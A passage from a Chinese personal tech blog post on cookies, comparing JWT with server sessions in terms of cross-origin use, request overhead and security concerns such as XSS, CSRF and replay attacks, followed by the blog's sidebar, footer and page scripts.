<p>这里的另一个挑战是，从一个服务器提供API并且实际应用程序从另一个服务器使用API是很常见的。 为实现这一目标，我们需要启用跨源资源共享（CORS） 。 由于cookie只能用于它们所源自的域，因此它们对不同域上的API的帮助不大于应用程序。 在这种情况下使用JWT进行身份验证可确保RESTful API无状态，您也不必担心API或应用程序的提供位置！</p>
<p><strong>3.表现：</strong>对此进行批判性分析是非常必要的。 当从客户端向服务器发出请求时，如果在JWT中编码了大量数据，则会对每个HTTP请求产生大量开销。 但是，对于会话，只有很少的开销，因为<strong>SESSION ID</strong>实际上非常小。</p>
<p>编码时，JWT的大小将是<strong>SESSION ID（标识符）</strong>大小的几倍，因此，对于每个HTTP请求，此JWT会增加比<strong>SESSION ID</strong>更多的开销。 对于会话，还有一个服务器端查找，用于在每个请求上查找和反序列化会话。</p>
<p>JWT通过将数据保留在客户端来交换延迟的大小。 应用程序的数据模型是一个重要因素，因为通过防止对服务器上的数据库进行不间断的调用和查询来节省延迟。 这里的想法是小心不要在JWT中存储太多的声明，以避免巨大的，过度膨胀的请求。</p>
<p>值得一提的是令牌可能需要访问后端的数据库。 刷新令牌尤其如此。 他们可能需要访问授权服务器上的数据库以进行黑名单。 获取有关刷新令牌以及何时使用它们的更多信息。 </p>
<p><strong>4.安全：</strong>签署JWT已经旨在防止客户端的篡改，但也可以加密它们以确保令牌携带的声明非常安全。 现在，JWT大多数直接存储在Web存储（本地/会话存储）或cookie中。 JavaScript可以访问同一个域中的Web存储。 这仅仅意味着您的JWT可能容易受到XSS（跨站点脚本）的攻击。 可以在页面上嵌入恶意JavaScript，以读取和破坏Web存储的内容。 事实上，很多人提倡由于XSS攻击，非常敏感的数据不应该存储在Web存储中。 一个非常典型的示例是确保您的JWT不使用非常敏感/可信的数据进行编码，例如用户的社会安全号码。</p>
<p>最初，我提到JWT可以存储在cookie中。 实际上，JWT在很多场合都存储为cookie，并且cookie容易受CSRF（跨站点请求伪造）攻击。 防止CSRF攻击的众多方法之一是确保您的cookie只能由您的域访问。 作为开发人员，无论JWT的使用如何，都要确保采取必要的CSRF保护措施以避免这些攻击。</p>
<p>现在，JWT和会话ID也可以暴露给未经重复的重播攻击。 完全由开发人员来确定适合其系统的重放缓解技术。 解决此问题的一种方法是确保JWT依赖于短暂的到期时间。</p>
<p><strong>注意</strong> ：使用HTTPS / SSL确保在客户端和服务器传输期间默认加密cookie和JWT。 这有助于避免中间人攻击！</p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    linfan
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://leolinf.github.io/2019/01/21/cookies/" title="cookies 深入理解">https://leolinf.github.io/2019/01/21/cookies/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/base/" rel="tag"># base</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/29/thrift/" rel="next" title="thrift 深入理解">
                <i class="fa fa-chevron-left"></i> thrift 深入理解
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/26/docker_tech/" rel="prev" title="docker 底层实现">
                docker 底层实现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">linfan</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/leolinf" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="funlin.py@foxmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#cookies起源"><span class="nav-number">1.</span> <span class="nav-text">cookies起源</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookie是什么"><span class="nav-number">2.</span> <span class="nav-text">cookie是什么</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookie-的作用"><span class="nav-number">3.</span> <span class="nav-text">cookie 的作用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookie-创建"><span class="nav-number">4.</span> <span class="nav-text">cookie 创建</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Expires和Max-Age-选项"><span class="nav-number">4.1.</span> <span class="nav-text">Expires和Max-Age 选项</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Domain-选项"><span class="nav-number">4.2.</span> <span class="nav-text">Domain 选项</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Path选项"><span class="nav-number">4.3.</span> <span class="nav-text">Path选项</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Secure选项"><span class="nav-number">4.4.</span> <span class="nav-text">Secure选项</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#HTTP-Only选项"><span class="nav-number">4.5.</span> <span class="nav-text">HTTP-Only选项</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SameSite选项"><span class="nav-number">4.6.</span> <span class="nav-text">SameSite选项</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#安全"><span class="nav-number">5.</span> <span class="nav-text">安全</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#会话劫持和-xss-跨站脚本攻击"><span class="nav-number">5.0.1.</span> <span class="nav-text">会话劫持和 xss(跨站脚本攻击)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#跨站请求伪造（CSRF）"><span class="nav-number">5.0.2.</span> <span class="nav-text">跨站请求伪造（CSRF）</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#追踪和隐私"><span class="nav-number">6.</span> <span class="nav-text">追踪和隐私</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#第三方Cookie"><span class="nav-number">6.0.1.</span> <span class="nav-text">第三方Cookie</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#禁止追踪Do-Not-Track"><span class="nav-number">6.0.2.</span> <span class="nav-text">禁止追踪Do-Not-Track</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#欧盟Cookie指令"><span class="nav-number">6.0.3.</span> <span class="nav-text">欧盟Cookie指令</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#僵尸Cookie和删不掉的Cookie"><span class="nav-number">6.0.4.</span> <span class="nav-text">僵尸Cookie和删不掉的Cookie</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#JWT和-SESSION-对比"><span class="nav-number">7.</span> <span class="nav-text">JWT和 SESSION 对比</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">linfan</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://linfan.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'https://leolinf.github.io/2019/01/21/cookies/';
          this.page.identifier = '2019/01/21/cookies/';
          this.page.title = 'cookies 深入理解';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://linfan.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  














  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("LUzXUpQ7OlcbPkVFjQkC5HfS-gzGzoHsz", "nw0Cmekguy8BRD72oekQYYYE");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  
  <script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
  <script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>


  

</body>
</html>
